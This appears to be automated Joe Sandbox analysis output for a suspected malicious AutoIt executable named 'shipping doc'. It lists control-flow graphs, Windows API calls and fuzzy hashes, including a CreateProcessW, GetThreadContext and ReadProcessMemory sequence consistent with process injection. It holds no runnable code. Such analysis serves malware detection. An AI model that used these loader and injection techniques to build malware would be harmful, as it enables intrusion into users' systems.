                                                                                              control_flow_graph 607 1822660-182270e call 1820000 610 1822715-182273b call 1823570 CreateFileW 607->610 613 1822742-1822752 610->613 614 182273d 610->614 622 1822754 613->622 623 1822759-1822773 VirtualAlloc 613->623 615 182288d-1822891 614->615 616 18228d3-18228d6 615->616 617 1822893-1822897 615->617 619 18228d9-18228e0 616->619 620 18228a3-18228a7 617->620 621 1822899-182289c 617->621 626 18228e2-18228ed 619->626 627 1822935-182294a 619->627 628 18228b7-18228bb 620->628 629 18228a9-18228b3 620->629 621->620 622->615 624 1822775 623->624 625 182277a-1822791 ReadFile 623->625 624->615 630 1822793 625->630 631 1822798-18227d8 VirtualAlloc 625->631 632 18228f1-18228fd 626->632 633 18228ef 626->633 634 182295a-1822962 627->634 635 182294c-1822957 VirtualFree 627->635 636 18228cb 628->636 637 18228bd-18228c7 628->637 629->628 630->615 638 18227da 631->638 639 18227df-18227fa call 18237c0 631->639 640 1822911-182291d 632->640 641 18228ff-182290f 632->641 633->627 635->634 636->616 637->636 638->615 647 1822805-182280f 639->647 644 182292a-1822930 640->644 645 182291f-1822928 640->645 643 1822933 641->643 643->619 644->643 645->643 648 1822842-1822856 call 18235d0 647->648 649 1822811-1822840 call 18237c0 647->649 654 182285a-182285e 648->654 655 1822858 648->655 649->647 657 1822860-1822864 FindCloseChangeNotification 654->657 658 182286a-182286e 654->658 655->615 657->658 659 1822870-182287b VirtualFree 658->659 660 182287e-1822887 658->660 659->660 660->610 660->615
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01822731
                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01822957
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1781184900.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1820000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFileFreeVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 204039940-0
                                                                                              • Opcode ID: 30e8af4b53c3aa052917812e21e5e8fbde56ed90f0e39d50c947676a587081b9
                                                                                              • Instruction ID: 4cdb41e899c9aaedcf6530c90a7d00cf1fbd8914120414cc449aaca792093e8f
                                                                                              • Opcode Fuzzy Hash: 30e8af4b53c3aa052917812e21e5e8fbde56ed90f0e39d50c947676a587081b9
                                                                                              • Instruction Fuzzy Hash: CCA10B74E04219EBDB15CFA8C894BEEBBB6FF48304F108159E505BB280D7799A81CF95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 671 e2c63-e2cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000E2C91
                                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000E2CB2
                                                                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,000E1CAD,?), ref: 000E2CC6
                                                                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,000E1CAD,?), ref: 000E2CCF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CreateShow
                                                                                              • String ID: AutoIt v3$edit
                                                                                              • API String ID: 1584632944-3779509399
                                                                                              • Opcode ID: a5634807e16b2b3864752d711b9008d2d9269efc2f836c697fe55870bec81a9f
                                                                                              • Instruction ID: 8aace35c873545533b96f8660e7ac14e683e39b126535b838a231af8da7f3fb6
                                                                                              • Opcode Fuzzy Hash: a5634807e16b2b3864752d711b9008d2d9269efc2f836c697fe55870bec81a9f
                                                                                              • Instruction Fuzzy Hash: FDF03A755402907AEB300727AC18E773EBDE7C6F60B56411EFA04A29B0E7610880DBB0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 786 1822410-182255e call 1820000 call 1822300 CreateFileW 793 1822560 786->793 794 1822565-1822575 786->794 795 1822615-182261a 793->795 797 1822577 794->797 798 182257c-1822596 VirtualAlloc 794->798 797->795 799 182259a-18225b1 ReadFile 798->799 800 1822598 798->800 801 18225b3 799->801 802 18225b5-18225ef call 1822340 call 1821300 799->802 800->795 801->795 807 18225f1-1822606 call 1822390 802->807 808 182260b-1822613 ExitProcess 802->808 807->808 808->795
                                                                                              APIs
                                                                                                • Part of subcall function 01822300: Sleep.KERNELBASE(000001F4), ref: 01822311
                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01822554
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1781184900.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1820000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFileSleep
                                                                                              • String ID: F2H3U7FXGNESPTAFHDCO8U9352B
                                                                                              • API String ID: 2694422964-978949579
                                                                                              • Opcode ID: 09b641d2ab496df41fdf1ad38480c3d3979fbf49808293a37ab5f74f25b2f426
                                                                                              • Instruction ID: bca543644020d43d32ab76c2c339a90c4ad9132afcdcc3f9b47362575501612f
                                                                                              • Opcode Fuzzy Hash: 09b641d2ab496df41fdf1ad38480c3d3979fbf49808293a37ab5f74f25b2f426
                                                                                              • Instruction Fuzzy Hash: 86619670D04298DAEF12DBF8C858BDEBBB59F19304F044199E249BB2C1D7B91B44CB66
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00152C05
                                                                                              • DeleteFileW.KERNEL32(?), ref: 00152C87
                                                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00152C9D
                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00152CAE
                                                                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00152CC0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Delete$Copy
                                                                                              • String ID:
                                                                                              • API String ID: 3226157194-0
                                                                                              • Opcode ID: 28c203e8e381cde1f6262b4fba184ec8e62012e12773f316a91d91d4083bd0e8
                                                                                              • Instruction ID: 94513efb5f6a419de7ec9199e7e566a886af90c79491df4182b4295ef9955421
                                                                                              • Opcode Fuzzy Hash: 28c203e8e381cde1f6262b4fba184ec8e62012e12773f316a91d91d4083bd0e8
                                                                                              • Instruction Fuzzy Hash: D8B17072A00119ABDF25DBA4CC85EDE77BDEF59301F1040A6F919EB142EB309A488F61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 952 e3b1c-e3b27 953 e3b99-e3b9b 952->953 954 e3b29-e3b2e 952->954 955 e3b8c-e3b8f 953->955 954->953 956 e3b30-e3b48 RegOpenKeyExW 954->956 956->953 957 e3b4a-e3b69 RegQueryValueExW 956->957 958 e3b6b-e3b76 957->958 959 e3b80-e3b8b RegCloseKey 957->959 960 e3b78-e3b7a 958->960 961 e3b90-e3b97 958->961 959->955 962 e3b7e 960->962 961->962 962->959
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,000E3B0F,SwapMouseButtons,00000004,?), ref: 000E3B40
                                                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,000E3B0F,SwapMouseButtons,00000004,?), ref: 000E3B61
                                                                                              • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,000E3B0F,SwapMouseButtons,00000004,?), ref: 000E3B83
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID: Control Panel\Mouse
                                                                                              • API String ID: 3677997916-824357125
                                                                                              • Opcode ID: c6c9623ee3b44351620aa980c59ce1e0fb6325c734e66e72aa7ae98ecc3c10a9
                                                                                              • Instruction ID: 712a9717a63f9b2df711b774e90c61ae840cb3b339e8a6680eeace54cff4d22b
                                                                                              • Opcode Fuzzy Hash: c6c9623ee3b44351620aa980c59ce1e0fb6325c734e66e72aa7ae98ecc3c10a9
                                                                                              • Instruction Fuzzy Hash: D5112AB5510248FFDB608FA6DC48AAEBBBCEF84744B10455AFA06E7110D3319E8097A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01821ABB
                                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01821B51
                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01821B73
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1781184900.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1820000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                              • String ID:
                                                                                              • API String ID: 2438371351-0
                                                                                              • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                                                              • Instruction ID: 5d3f160398f620e160675f1525422c0612f6e32eb6e62733fbe2e4baead1d5ef
                                                                                              • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                                                              • Instruction Fuzzy Hash: 6F620B34A14258DBEB25CFA4C854BDEB772EF58300F1091A9D20DEB390E7799E81CB59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              • Variable must be of type 'Object'., xrefs: 001332B7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Variable must be of type 'Object'.
                                                                                              • API String ID: 0-109567571
                                                                                              • Opcode ID: 91dc3e1f4be2f22bf7024209b6586e35eda906856f1da54e1aeda3ab279a3d27
                                                                                              • Instruction ID: b4dc7556d13fc04b16e20b4cc5821139c589ae7e1ec752fe227d8948cbd19aef
                                                                                              • Opcode Fuzzy Hash: 91dc3e1f4be2f22bf7024209b6586e35eda906856f1da54e1aeda3ab279a3d27
                                                                                              • Instruction Fuzzy Hash: 3EC28E71A00289CFCB24CF69C884AADB7F1BF18310F248569E955BB392D775EE81CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00100668
                                                                                                • Part of subcall function 001032A4: RaiseException.KERNEL32(?,?,?,0010068A,?,001B1444,?,?,?,?,?,?,0010068A,000E1129,001A8738,000E1129), ref: 00103304
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00100685
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                                                              • String ID: Unknown exception
                                                                                              • API String ID: 3476068407-410509341
                                                                                              • Opcode ID: 77be39b427834d7f4abf3c253d139d34847c60374fbd82b5ff31cca6998546dc
                                                                                              • Instruction ID: e508d28ed568cb3acc8a4abc370092efc549cd0636609b536fd7b338c7987066
                                                                                              • Opcode Fuzzy Hash: 77be39b427834d7f4abf3c253d139d34847c60374fbd82b5ff31cca6998546dc
                                                                                              • Instruction Fuzzy Hash: 53F0F63890020DB7CB01B6A5DC46EAE7BAE6F14350F604531B968D69D1EFF2EA66C5C0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0015302F
                                                                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00153044
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Temp$FileNamePath
                                                                                              • String ID: aut
                                                                                              • API String ID: 3285503233-3010740371
                                                                                              • Opcode ID: 17515ca75fe33c3f7644e0536c8144842d9895343bbb9dcbe166e1912dac07ff
                                                                                              • Instruction ID: 05723c6e87664678b3dcdbda9248a9b5421c34dfc99b040f24f853120c50c037
                                                                                              • Opcode Fuzzy Hash: 17515ca75fe33c3f7644e0536c8144842d9895343bbb9dcbe166e1912dac07ff
                                                                                              • Instruction Fuzzy Hash: 8AD05E7650032867DB20A7A4AC0EFCB7A7CDB05750F0002A1B659E2092DAB09AC4CBD0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 001682F5
                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 001682FC
                                                                                              • FreeLibrary.KERNEL32(?,?,?,?), ref: 001684DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentFreeLibraryTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 146820519-0
                                                                                              • Opcode ID: bf0482b51371c3d5d3ff0ad2d1283afefbc1204da18d1661f74ddc46d3751624
                                                                                              • Instruction ID: 7a6af4551a38a69ed7e3a70f84f9a3cb9a1077b88145debbacd9bbb43f87ae4c
                                                                                              • Opcode Fuzzy Hash: bf0482b51371c3d5d3ff0ad2d1283afefbc1204da18d1661f74ddc46d3751624
                                                                                              • Instruction Fuzzy Hash: D3126B719083419FC714DF28C884B6ABBE5BF88314F048A5DE8999B392DB31ED45CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8985ccc4042c2cf5440e7aad897565936ec5b2b47958630db1bd8bd974bcc3a9
                                                                                              • Instruction ID: 0478ee08b6848426d319b388267808ff15b526c4f6ee10b14ffa7b90bc891761
                                                                                              • Opcode Fuzzy Hash: 8985ccc4042c2cf5440e7aad897565936ec5b2b47958630db1bd8bd974bcc3a9
                                                                                              • Instruction Fuzzy Hash: CB51C371E04609DFCB299FA4C845FEEBBBAEF95310F140079F405A7291D7719A81CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000E1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 000E1BF4
                                                                                                • Part of subcall function 000E1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 000E1BFC
                                                                                                • Part of subcall function 000E1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 000E1C07
                                                                                                • Part of subcall function 000E1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 000E1C12
                                                                                                • Part of subcall function 000E1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 000E1C1A
                                                                                                • Part of subcall function 000E1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 000E1C22
                                                                                                • Part of subcall function 000E1B4A: RegisterWindowMessageW.USER32(00000004,?,000E12C4), ref: 000E1BA2
                                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 000E136A
                                                                                              • OleInitialize.OLE32 ref: 000E1388
                                                                                              • CloseHandle.KERNEL32(00000000,00000000), ref: 001224AB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1986988660-0
                                                                                              • Opcode ID: 144eb51398f37ef057ee0ae57d832de62849fc0b8b1bd926840931550a3ffe25
                                                                                              • Instruction ID: fadb86ed8b935737f87b5bb03d7653cdd95d6944f9f863207ee212522e8f78e6
                                                                                              • Opcode Fuzzy Hash: 144eb51398f37ef057ee0ae57d832de62849fc0b8b1bd926840931550a3ffe25
                                                                                              • Instruction Fuzzy Hash: C971C4B5911340AFC3A4DF7AE9756953BE1FB8A3443D6832ED40AE7A62EB304481CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 000E556D
                                                                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 000E557D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: 945092cfb803d85dafbd101fd2e6b4beed98dfbed7f04d12825e013b9bcbaa8a
                                                                                              • Instruction ID: 4cc0efd3da3602077e3deaafcb4b77ff0c3159df5c6f2bad59b21ad4482fa39f
                                                                                              • Opcode Fuzzy Hash: 945092cfb803d85dafbd101fd2e6b4beed98dfbed7f04d12825e013b9bcbaa8a
                                                                                              • Instruction Fuzzy Hash: 7C316F72A00A59EFDB14CF29CC80B9DB7B5FB44319F148A29E915A7240D771FD94CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,001185CC,?,001A8CC8,0000000C), ref: 00118704
                                                                                              • GetLastError.KERNEL32(?,001185CC,?,001A8CC8,0000000C), ref: 0011870E
                                                                                              • __dosmaperr.LIBCMT ref: 00118739
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                                                              • String ID:
                                                                                              • API String ID: 490808831-0
                                                                                              • Opcode ID: 59daee6fb79374a969dcfa6a628fc1bb5510cc8640bac9b3efd7e3f957f284cc
                                                                                              • Instruction ID: 84fa7c66c65681f407d9ae5b422ef8be19b3d142edf4e557b770eb71d76d3110
                                                                                              • Opcode Fuzzy Hash: 59daee6fb79374a969dcfa6a628fc1bb5510cc8640bac9b3efd7e3f957f284cc
                                                                                              • Instruction Fuzzy Hash: 98014E32A1562057D76D633468457FE675A5BD1774F39423EF8189B1D2DFA0CCC1C190
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00152CD4,?,?,?,00000004,00000001), ref: 00152FF2
                                                                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00152CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00153006
                                                                                              • CloseHandle.KERNEL32(00000000,?,00152CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0015300D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CloseCreateHandleTime
                                                                                              • String ID:
                                                                                              • API String ID: 3397143404-0
